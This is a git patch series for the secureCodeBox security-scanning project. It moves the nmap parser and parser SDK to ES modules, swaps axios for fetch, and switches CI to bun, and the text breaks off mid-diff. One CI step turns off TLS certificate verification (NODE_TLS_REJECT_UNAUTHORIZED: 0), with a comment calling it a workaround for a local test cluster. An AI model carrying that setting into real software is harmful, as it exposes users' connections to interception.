...error, + invalidValue: get(findings, error.instancePath), + }; + }), + null, + 2, + ); } - -module.exports.addIdsAndDates = addIdsAndDates; -module.exports.addScanMetadata = addScanMetadata; -module.exports.validate = validateAgainstJsonSchema; -module.exports.validateParser = addSampleIdsAndDatesAndValidate; diff --git a/parser-sdk/nodejs/parser-wrapper.js b/parser-sdk/nodejs/parser-wrapper.js index 7f645dc30b..d537392de0 100644 --- a/parser-sdk/nodejs/parser-wrapper.js +++ b/parser-sdk/nodejs/parser-wrapper.js @@ -2,27 +2,34 @@ // // SPDX-License-Identifier: Apache-2.0 -const axios = require("axios"); -const { parse } = require("./parser/parser"); -const { validate, addIdsAndDates, addScanMetadata } = require("./parser-utils"); -const k8s = require("@kubernetes/client-node"); - -const kc = new k8s.KubeConfig(); +import axios from "axios"; +import { + KubeConfig, + CustomObjectsApi, + setHeaderOptions, + PatchStrategy, +} from "@kubernetes/client-node"; + +import { parse } from "./parser/parser.js"; +import { validate, addIdsAndDates, addScanMetadata } from "./parser-utils.js"; + +const kc = new KubeConfig(); kc.loadFromCluster(); -const k8sApi = kc.makeApiClient(k8s.CustomObjectsApi); +const k8sApi = kc.makeApiClient(CustomObjectsApi); + const scanName = process.env["SCAN_NAME"]; const namespace = process.env["NAMESPACE"]; function severityCount(findings, severity) { return findings.filter( ({ severity: findingSeverity }) => - findingSeverity.toUpperCase() === severity + findingSeverity.toUpperCase() === severity, ).length; } async function uploadResultToFileStorageService( resultUploadUrl, - findingsWithIdsAndDates + findingsWithIdsAndDates, ) { return axios .put(resultUploadUrl, findingsWithIdsAndDates, { @@ -34,12 +41,12 @@ async function uploadResultToFileStorageService( // The request was made and the server responded with a status code // that falls out of the range of 2xx console.error( - `Finding Upload Failed with Response Code: ${error.response.status}` + `Finding Upload Failed with Response Code: ${error.response.status}`, ); console.error(`Error Response Body: ${error.response.data}`); } else if (error.request) { console.error( - "No response received from FileStorage when uploading finding" + "No response received from FileStorage when uploading finding", ); console.error(error); } else { @@ -62,29 +69,28 @@ async function updateScanStatus(findings) { } await k8sApi.patchNamespacedCustomObjectStatus( - "execution.securecodebox.io", - "v1", - namespace, - "scans", - scanName, { - status: { - findings: { - count: findings.length, - severities: { - informational: severityCount(findings, "INFORMATIONAL"), - low: severityCount(findings, "LOW"), - medium: severityCount(findings, "MEDIUM"), - high: severityCount(findings, "HIGH"), + group: "execution.securecodebox.io", + version: "v1", + namespace, + plural: "scans", + name: scanName, + body: { + status: { + findings: { + count: findings.length, + severities: { + informational: severityCount(findings, "INFORMATIONAL"), + low: severityCount(findings, "LOW"), + medium: severityCount(findings, "MEDIUM"), + high: severityCount(findings, "HIGH"), + }, + categories: Object.fromEntries(findingCategories.entries()), }, - categories: Object.fromEntries(findingCategories.entries()), }, }, }, - undefined, - undefined, - undefined, - { headers: { "content-type": "application/merge-patch+json" } } + setHeaderOptions("Content-Type", PatchStrategy.MergePatch), ); console.log("Updated status successfully"); } catch (err) { @@ -96,32 +102,29 @@ async function updateScanStatus(findings) { async function extractScan() { try { - const { body } = await k8sApi.getNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + return await k8sApi.getNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", + name: scanName, namespace, - "scans", - scanName - ); - return body; + }); } catch (err) { console.error("Failed to get Scan from the kubernetes api"); console.error(err); process.exit(1); } - } async function extractParseDefinition(scan) { try { - const { body } = await k8sApi.getNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + return await k8sApi.getNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "parsedefinitions", + name: scan.status.rawResultType, namespace, - "parsedefinitions", - scan.status.rawResultType - ); - return body; + }); } catch (err) { console.error("Failed to get ParseDefinition from the kubernetes api"); console.error(err); @@ -138,8 +141,8 @@ async function main() { console.log("Fetching result file"); let response; - if(parseDefinition.spec.contentType === "Binary"){ - response = await axios.get(resultFileUrl, {responseType: 'arraybuffer'}); + if (parseDefinition.spec.contentType === "Binary") { + response = await axios.get(resultFileUrl, { responseType: "arraybuffer" }); } else { response = await axios.get(resultFileUrl); } @@ -162,11 +165,15 @@ async function main() { console.log("Adding scan metadata to the findings"); const findingsWithMetadata = addScanMetadata(findingsWithIdsAndDates, scan); - const crash_on_failed_validation = process.env["CRASH_ON_FAILED_VALIDATION"] === "true" - console.log("Validating Findings. Environment variable CRASH_ON_FAILED_VALIDATION is set to %s", crash_on_failed_validation); + const crash_on_failed_validation = + process.env["CRASH_ON_FAILED_VALIDATION"] === "true"; + console.log( + "Validating Findings. Environment variable CRASH_ON_FAILED_VALIDATION is set to %s", + crash_on_failed_validation, + ); try { await validate(findingsWithMetadata); - console.log("The Findings were successfully validated") + console.log("The Findings were successfully validated"); } catch (error) { console.error("The Findings Validation failed with error(s):"); console.error(error); @@ -179,15 +186,9 @@ async function main() { console.log(`Uploading results to the file storage service`); - await uploadResultToFileStorageService( - resultUploadUrl, - findingsWithMetadata - ); + await uploadResultToFileStorageService(resultUploadUrl, findingsWithMetadata); console.log(`Completed parser`); } main(); - -module.exports.addIdsAndDates = addIdsAndDates; -module.exports.addScanMetadata = addScanMetadata; diff --git a/scanners/nmap/parser/package-lock.json b/scanners/nmap/parser/package-lock.json index d3ff999aa1..760276d131 100644 --- a/scanners/nmap/parser/package-lock.json +++ b/scanners/nmap/parser/package-lock.json @@ -9,15 +9,16 @@ "version": "1.0.0", "license": "Apache-2.0", "dependencies": { - "lodash": "^4.17.21", - "xml2js": "^0.6.0" + "lodash-es": "^4.17.21", + "xml2js": "^0.6.2" }, "devDependencies": {} }, - "node_modules/lodash": { + "node_modules/lodash-es": { "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==", + "license": "MIT" }, "node_modules/sax": { "version": "1.2.4", @@ -25,9 +26,10 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "node_modules/xml2js": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.0.tgz", - "integrity": "sha512-eLTh0kA8uHceqesPqSE+VvO1CDDJWMwlQfB6LuN6T8w6MaDJ8Txm8P7s5cHD0miF0V+GGTZrDQfxPZQVsur33w==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", + "license": "MIT", "dependencies": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" @@ -46,10 +48,10 @@ } }, "dependencies": { - "lodash": { + "lodash-es": { "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + "resolved": "https://registry.npmjs.org/lodash-es/-/lodash-es-4.17.21.tgz", + "integrity": "sha512-mKnC+QJ9pWVzv+C4/U3rRsHapFfHvQFoFB92e52xeyGMcX6/OlIl78je1u8vePzYZSkkogMPJ2yjxxsb89cxyw==" }, "sax": { "version": "1.2.4", @@ -57,9 +59,9 @@ "integrity": "sha512-NqVDv9TpANUjFm0N8uM5GxL36UgKi9/atZw+x7YFnQ8ckwFGKrl4xX4yWtrey3UJm5nP1kUbnYgLopqWNSRhWw==" }, "xml2js": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.0.tgz", - "integrity": "sha512-eLTh0kA8uHceqesPqSE+VvO1CDDJWMwlQfB6LuN6T8w6MaDJ8Txm8P7s5cHD0miF0V+GGTZrDQfxPZQVsur33w==", + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/xml2js/-/xml2js-0.6.2.tgz", + "integrity": "sha512-T4rieHaC1EXcES0Kxxj4JWgaUQHDk+qwHcYOCFHfiwKz7tOVPLq7Hjq9dM1WCMhylqMEfP7hMcOIChvotiZegA==", "requires": { "sax": ">=0.6.0", "xmlbuilder": "~11.0.0" diff --git a/scanners/nmap/parser/package.json b/scanners/nmap/parser/package.json index 6e5f06da7a..733c619bf5 100644 --- a/scanners/nmap/parser/package.json +++ b/scanners/nmap/parser/package.json @@ -5,11 +5,12 @@ "main": "", "scripts": {}, "keywords": [], + "type": "module", "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "lodash": "^4.17.21", - "xml2js": "^0.6.0" + "lodash-es": "^4.17.21", + "xml2js": "^0.6.2" }, "devDependencies": {} -} +} \ No newline at end of file diff --git a/scanners/nmap/parser/parser.js b/scanners/nmap/parser/parser.js index 717dd867fd..b34cb1f2fc 100644 --- a/scanners/nmap/parser/parser.js +++ b/scanners/nmap/parser/parser.js @@ -2,11 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const xml2js = require('xml2js'); -const { get, merge } = require('lodash'); +import { parseString } from 'xml2js'; +import { get, merge } from 'lodash-es'; - -async function parse(fileContent) { +export async function parse(fileContent) { const hosts = await parseResultFile(fileContent); return transformToFindings(hosts); } @@ -244,7 +243,7 @@ function parseSmbProtocols(host, script) { */ function parseResultFile(fileContent) { return new Promise((resolve, reject) => { - xml2js.parseString(fileContent, (err, xmlInput) => { + parseString(fileContent, (err, xmlInput) => { if (err) { reject(new Error('Error converting XML to JSON in xml2js: ' + err)); } else { @@ -371,5 +370,3 @@ function parseResultFile(fileContent) { }); }); } - -module.exports.parse = parse; diff --git a/scanners/nmap/parser/parser.test.js b/scanners/nmap/parser/parser.test.js index 4701dde475..595f0a97e8 100644 --- a/scanners/nmap/parser/parser.test.js +++ b/scanners/nmap/parser/parser.test.js @@ -2,19 +2,17 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const {parse} = require("./parser"); +import { parse } from "./parser"; test("should properly parse nmap xml file", async () => { const xmlContent = await readFile( - __dirname + "/__testFiles__/localhost.xml", + import.meta.dirname + "/__testFiles__/localhost.xml", { encoding: "utf8", - } + }, ); const findings = await parse(xmlContent); // validate findings @@ -141,9 +139,12 @@ test("should properly parse nmap xml file", async () => { }); test("should properly parse a nmap xml without any ports", async () => { - const xmlContent = await readFile(__dirname + "/__testFiles__/no-ports.xml", { - encoding: "utf8", - }); + const xmlContent = await readFile( + import.meta.dirname + "/__testFiles__/no-ports.xml", + { + encoding: "utf8", + }, + ); const findings = await parse(xmlContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -169,9 +170,12 @@ test("should properly parse a nmap xml without any ports", async () => { }); test("should properly parse a nmap xml without any host", async () => { - const xmlContent = await readFile(__dirname + "/__testFiles__/no-host.xml", { - encoding: "utf8", - }); + const xmlContent = await readFile( + import.meta.dirname + "/__testFiles__/no-host.xml", + { + encoding: "utf8", + }, + ); const findings = await parse(xmlContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -180,10 +184,10 @@ test("should properly parse a nmap xml without any host", async () => { test("should properly parse a nmap xml with missing service information", async () => { const xmlContent = await readFile( - __dirname + "/__testFiles__/no-service.xml", + import.meta.dirname + "/__testFiles__/no-service.xml", { encoding: "utf8", - } + }, ); const findings = await parse(xmlContent); @@ -236,10 +240,10 @@ test("should properly parse a nmap xml with missing service information", async test("Should properly parse a nmap xml with script specific SMB findings", async () => { const xmlContent = await readFile( - __dirname + "/__testFiles__/localhost-smb-script.xml", + import.meta.dirname + "/__testFiles__/localhost-smb-script.xml", { encoding: "utf8", - } + }, ); const findings = await parse(xmlContent); @@ -441,9 +445,12 @@ test("Should properly parse a nmap xml with script specific SMB findings", async }); test("should properly parse a script finding for ftp in an xml file", async () => { - const xmlContent = await readFile(__dirname + "/__testFiles__/ftp.xml", { - encoding: "utf8", - }); + const xmlContent = await readFile( + import.meta.dirname + "/__testFiles__/ftp.xml", + { + encoding: "utf8", + }, + ); const findings = await parse(xmlContent); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(await parse(xmlContent)).toMatchInlineSnapshot(` @@ -460,11 +467,15 @@ test("should properly parse a script finding for ftp in an xml file", async () = "port": 21, "protocol": "tcp", "scripts": { - "banner": "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x + "banner": + "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x 0D\\x0A220-You are user number 2 of 30 allowed.\\x0D\\x0A220-Local time... - ", - "ftp-anon": "Anonymous FTP login allowed (FTP code 230) - Can't get directory listing: PASV IP 127.0.0.1 is not the same as 10.103.42.74", + " + , + "ftp-anon": + "Anonymous FTP login allowed (FTP code 230) + Can't get directory listing: PASV IP 127.0.0.1 is not the same as 10.103.42.74" + , }, "service": "ftp", "serviceProduct": null, @@ -496,9 +507,11 @@ test("should properly parse a script finding for ftp in an xml file", async () = }, { "attributes": { - "banner": "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x + "banner": + "220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x 0D\\x0A220-You are user number 2 of 30 allowed.\\x0D\\x0A220-Local time... - ", + " + , "script": "banner", }, "category": "FTP", @@ -525,10 +538,10 @@ test("should properly parse a script finding for ftp in an xml file", async () = test("should parse scanme.nmap.org results properly", async () => { const xmlContent = await readFile( - __dirname + "/__testFiles__/scanme.nmap.org-ipv6.xml", + import.meta.dirname + "/__testFiles__/scanme.nmap.org-ipv6.xml", { encoding: "utf8", - } + }, ); const findings = await parse(xmlContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -630,13 +643,13 @@ test("should parse scanme.nmap.org results properly", async () => { test("should parse output of runs run --verbose properly", async () => { const xmlContent = await readFile( - __dirname + "/__testFiles__/local-network-verbose.xml", + import.meta.dirname + "/__testFiles__/local-network-verbose.xml", { encoding: "utf8", - } + }, ); const findings = await parse(xmlContent); - await expect(validateParser(findings)).resolves.toBeUndefined(); + await validateParser(findings); expect(await parse(xmlContent)).toMatchInlineSnapshot(` [ { From 45ada2348ccd27b6fcc946f3575e058489023233 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Sun, 15 Jun 2025 21:52:31 +0200 Subject: [PATCH 002/137] Drop axios requirement for parser-wrapper Signed-off-by: Jannik Hollenbach --- parser-sdk/nodejs/package-lock.json | 59 +------------------ parser-sdk/nodejs/package.json | 4 +- parser-sdk/nodejs/parser-wrapper.js | 87 +++++++++++++++++++---------- 3 files changed, 60 insertions(+), 90 deletions(-) diff --git a/parser-sdk/nodejs/package-lock.json b/parser-sdk/nodejs/package-lock.json index c844ac5d88..79c255946a 100644 --- a/parser-sdk/nodejs/package-lock.json +++ b/parser-sdk/nodejs/package-lock.json @@ -13,9 +13,7 @@ "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", - "axios": "^1.7.9", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" + "jsonpointer": "^5.0.1" } }, "node_modules/@jsep-plugin/assignment": { @@ -163,17 +161,6 @@ "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" }, - "node_modules/axios": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.10.0.tgz", - "integrity": "sha512-/1xYAC4MP/HEG+3duIhFr4ZQXR4sQXOIe+o6sdqzeykGLx6Upp/1p8MHqhINOvGeP7xyNHe7tsiJByc4SSVUxw==", - "license": "MIT", - "dependencies": { - "follow-redirects": "^1.15.6", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } - }, "node_modules/b4a": { "version": "1.6.7", "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", @@ -313,25 +300,6 @@ "resolved": "https://registry.npmjs.org/fast-uri/-/fast-uri-3.0.3.tgz", "integrity": "sha512-aLrHthzCjH5He4Z2H9YZ+v6Ujb9ocRuW6ZzkJQOrTxleEijANq4v1TsaPaVG1PZcuurEzrLcWRyYBYXD5cEiaw==" }, - "node_modules/follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/RubenVerborgh" - } - ], - "engines": { - "node": ">=4.0" - }, - "peerDependenciesMeta": { - "debug": { - "optional": true - } - } - }, "node_modules/form-data": { "version": "4.0.1", "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.1.tgz", @@ -515,11 +483,6 @@ "url": "https://github.com/sponsors/panva" } }, - "node_modules/proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, "node_modules/pump": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.2.tgz", @@ -804,16 +767,6 @@ "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" }, - "axios": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.10.0.tgz", - "integrity": "sha512-/1xYAC4MP/HEG+3duIhFr4ZQXR4sQXOIe+o6sdqzeykGLx6Upp/1p8MHqhINOvGeP7xyNHe7tsiJByc4SSVUxw==", - "requires": { - "follow-redirects": "^1.15.6", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } - }, "b4a": { "version": "1.6.7", "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", @@ -904,11 +857,6 @@ "resolved": "https://registry.npmjs.org/fast-uri/-/fast-uri-3.0.3.tgz", "integrity": "sha512-aLrHthzCjH5He4Z2H9YZ+v6Ujb9ocRuW6ZzkJQOrTxleEijANq4v1TsaPaVG1PZcuurEzrLcWRyYBYXD5cEiaw==" }, - "follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" - }, "form-data": { "version": "4.0.1", "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.1.tgz", @@ -1030,11 +978,6 @@ "oauth4webapi": "^3.1.1" } }, - "proxy-from-env": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", - "integrity": "sha512-D+zkORCbA9f1tdWRK0RaCR3GPv50cMxcrz4X8k5LTSUD1Dkw47mKJEZQNunItRTkWwgtaUSo1RVFRIG9ZXiFYg==" - }, "pump": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.2.tgz", diff --git a/parser-sdk/nodejs/package.json b/parser-sdk/nodejs/package.json index f9e77d0282..5378db798f 100644 --- a/parser-sdk/nodejs/package.json +++ b/parser-sdk/nodejs/package.json @@ -12,8 +12,6 @@ "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", - "axios": "^1.7.9", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" + "jsonpointer": "^5.0.1" } } \ No newline at end of file diff --git a/parser-sdk/nodejs/parser-wrapper.js b/parser-sdk/nodejs/parser-wrapper.js index d537392de0..4534185bc7 100644 --- a/parser-sdk/nodejs/parser-wrapper.js +++ b/parser-sdk/nodejs/parser-wrapper.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -import axios from "axios"; +import { Buffer } from "node:buffer"; import { KubeConfig, CustomObjectsApi, @@ -31,30 +31,34 @@ async function uploadResultToFileStorageService( resultUploadUrl, findingsWithIdsAndDates, ) { - return axios - .put(resultUploadUrl, findingsWithIdsAndDates, { + try { + const res = await fetch(resultUploadUrl, { + method: "PUT", headers: { "content-type": "" }, - maxBodyLength: Infinity, - }) - .catch(function (error) { - if (error.response) { - // The request was made and the server responded with a status code - // that falls out of the range of 2xx - console.error( - `Finding Upload Failed with Response Code: ${error.response.status}`, - ); - console.error(`Error Response Body: ${error.response.data}`); - } else if (error.request) { - console.error( - "No response received from FileStorage when uploading finding", - ); - console.error(error); - } else { - // Something happened in setting up the request that triggered an Error - console.log("Error", error.message); - } - process.exit(1); + body: JSON.stringify(findingsWithIdsAndDates), }); + if (!res.ok) { + const text = await res.text(); + console.error(`Finding Upload Failed with Response Code: ${res.status}`); + console.error(`Error Response Body: ${text}`); + process.exit(1); + } + } catch (error) { + if (error.response) { + console.error( + `Finding Upload Failed with Response Code: ${error.response.status}`, + ); + console.error(`Error Response Body: ${error.response.data}`); + } else if (error.request) { + console.error( + "No response received from FileStorage when uploading finding", + ); + console.error(error); + } else { + console.log("Error", error.message); + } + process.exit(1); + } } async function updateScanStatus(findings) { @@ -132,6 +136,26 @@ async function extractParseDefinition(scan) { } } +async function fetchResultFile(resultFileUrl, contentType) { + try { + const response = await fetch(resultFileUrl, { method: "GET" }); + if (!response.ok) { + throw new Error( + `Failed to fetch result file: ${response.status} ${response.statusText}`, + ); + } + if (contentType === "Binary") { + return Buffer.from(await response.arrayBuffer()); + } else { + return await response.text(); + } + } catch (err) { + throw new Error( + `Failed to fetch result file from ${resultFileUrl}: ${err.message}`, + ); + } +} + async function main() { console.log("Starting Parser"); let scan = await extractScan(); @@ -140,18 +164,23 @@ async function main() { const resultUploadUrl = process.argv[3]; console.log("Fetching result file"); - let response; - if (parseDefinition.spec.contentType === "Binary") { - response = await axios.get(resultFileUrl, { responseType: "arraybuffer" }); - } else { - response = await axios.get(resultFileUrl); + let data = null; + try { + data = await fetchResultFile( + resultFileUrl, + parseDefinition.spec.contentType, + ); + } catch (error) { + console.error("Failed to fetch scan result file for parser:"); + console.error(error); + process.exit(1); } console.log("Fetched result file"); let findings = []; try { - findings = await parse(response.data, scan); + findings = await parse(data, scan); } catch (error) { console.error("Parser failed with error:"); console.error(error); From 27733632e0e846f5361457f5bf33a49c3a9c0491 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 19:49:46 +0200 Subject: [PATCH 003/137] Migrate nmap integration test to esm Signed-off-by: Jannik Hollenbach --- scanners/nmap/integration-tests/nmap.test.js | 22 ++++++++++++-------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/scanners/nmap/integration-tests/nmap.test.js b/scanners/nmap/integration-tests/nmap.test.js index 9ab07ecb7c..1ec125cc19 100644 --- a/scanners/nmap/integration-tests/nmap.test.js +++ b/scanners/nmap/integration-tests/nmap.test.js @@ -2,18 +2,16 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "localhost port scan should only find a host finding", async () => { - const {categories, severities, count} = await scan( + const { categories, severities, count } = await scan( "nmap-localhost", "nmap", ["localhost"], - 90 + 90, ); expect(count).toBe(1); @@ -28,17 +26,23 @@ test( } `); }, - 3 * 60 * 1000 + { + timeout: 3 * 60 * 1000, + retry: 3, + }, ); test( "invalid port scan should be marked as errored", async () => { await expect( - scan("nmap-localhost", "nmap", ["-invalidFlag", "localhost"], 90) + scan("nmap-localhost", "nmap", ["-invalidFlag", "localhost"], 90), ).rejects.toThrow( - 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"' + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', ); }, - 3 * 60 * 1000 + { + timeout: 3 * 60 * 1000, + retry: 3, + }, ); From dc3d154dd3d4f74e8c080997ff4a9ce7ea55043a Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 19:55:36 +0200 Subject: [PATCH 004/137] Sketch out migrated scanner test pipeline for esm migration Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 55 +++++++++++++++++++++------------------ 1 file changed, 30 insertions(+), 25 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index c11aafb4e6..6d883ccb23 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -408,7 +408,7 @@ jobs: # ---- Test | Scanners ---- test-scanners: - name: "Test | Scanner ${{ matrix.unit }}" + name: "Test | Scanner ${{ matrix.unit }}" needs: - sdk - operator @@ -418,32 +418,31 @@ jobs: fail-fast: false matrix: unit: - - amass - - cmseek - - ffuf - - git-repo-scanner - - gitleaks - - kube-hunter - - ncrack - - nikto + # - amass + # - cmseek + # - ffuf + # - git-repo-scanner + # - gitleaks + # - kube-hunter + # - ncrack + # - nikto - nmap - - nuclei - - screenshooter - - semgrep - - ssh-audit - - sslyze - - trivy - - trivy-sbom - - whatweb - - wpscan - - zap-automation-framework + # - nuclei + # - screenshooter + # - semgrep + # - ssh-audit + # - sslyze + # - trivy + # - trivy-sbom + # - whatweb + # - wpscan + # - zap-automation-framework steps: - name: Checkout uses: actions/checkout@v4 - - uses: actions/setup-node@v4 - with: - node-version-file: ".nvmrc" + - name: Install bun + uses: oven-sh/setup-bun@v2 - name: Download Kind uses: actions/download-artifact@v4 @@ -477,11 +476,13 @@ jobs: - name: Install Dependencies working-directory: ./scanners/${{ matrix.unit }}/ - run: make install-deps + #install dependencies for the parser if the directory has a package.json + if: exists('./scanners/${{ matrix.unit }}/package.json') + run: bun install - name: Unit Tests working-directory: ./scanners/${{ matrix.unit }}/ - run: make unit-tests + run: bun test --coverage parser/ - name: Download Parser SDK Image uses: actions/download-artifact@v4 @@ -547,7 +548,11 @@ jobs: - name: Start Integration Tests working-directory: ./scanners/${{ matrix.unit }}/ - run: make integration-tests + env: + # Workaround for https://github.com/oven-sh/bun/issues/7332 + # not great, but this is a local connection to the kind cluster + NODE_TLS_REJECT_UNAUTHORIZED: 0 + run: bun test integration-tests/ # ---- Debuging Cluster on Failure ---- From 6314e894cc8c682f66f55bc70b2efd8dfaea55d1 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:08:21 +0200 Subject: [PATCH 005/137] Also install parser-sdk dependencies Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 6d883ccb23..795c6e3f48 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -474,6 +474,10 @@ jobs: kubectl version || true helm version + - name: Install ParserSDK Dependencies + working-directory: ./parser-sdk/nodejs/ + run: bun install + - name: Install Dependencies working-directory: ./scanners/${{ matrix.unit }}/ #install dependencies for the parser if the directory has a package.json From e5268e692e21ec8852ceaa414080a560a8877a16 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:12:25 +0200 Subject: [PATCH 006/137] Reformat w/ prettier Signed-off-by: Jannik Hollenbach --- .../zap-automation-framework.test.js | 98 +++++++++++-------- .../parser/parser.test.js | 10 +- 2 files changed, 62 insertions(+), 46 deletions(-) diff --git a/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js b/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js index 6883246d45..361f82f98e 100644 --- a/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js +++ b/scanners/zap-automation-framework/integration-tests/zap-automation-framework.test.js @@ -13,21 +13,25 @@ test.concurrent( ["-autorun", "/home/securecodebox/scb-automation/automation.yaml"], 60 * 30, // volumes - [{ - "name": "zap-automation-framework-bodgeit", - "configMap": {"name": "zap-automation-framework-bodgeit"} - }], + [ + { + name: "zap-automation-framework-bodgeit", + configMap: { name: "zap-automation-framework-bodgeit" }, + }, + ], // volumeMounts - [{ - "name": "zap-automation-framework-bodgeit", - "mountPath": "/home/securecodebox/scb-automation/automation.yaml", - "subPath": "automation.yaml" - }], + [ + { + name: "zap-automation-framework-bodgeit", + mountPath: "/home/securecodebox/scb-automation/automation.yaml", + subPath: "automation.yaml", + }, + ], ); // There must be at least one finding expect(count).toBeGreaterThanOrEqual(1); }, - 60 * 8 * 1000 + 60 * 8 * 1000, ); test.concurrent( @@ -39,21 +43,25 @@ test.concurrent( ["-autorun", "/home/securecodebox/scb-automation/automation.yaml"], 60 * 30, // volumes - [{ - "name": "zap-automation-framework-petstore", - "configMap": {"name": "zap-automation-framework-petstore"} - }], + [ + { + name: "zap-automation-framework-petstore", + configMap: { name: "zap-automation-framework-petstore" }, + }, + ], // volumeMounts - [{ - "name": "zap-automation-framework-petstore", - "mountPath": "/home/securecodebox/scb-automation/automation.yaml", - "subPath": 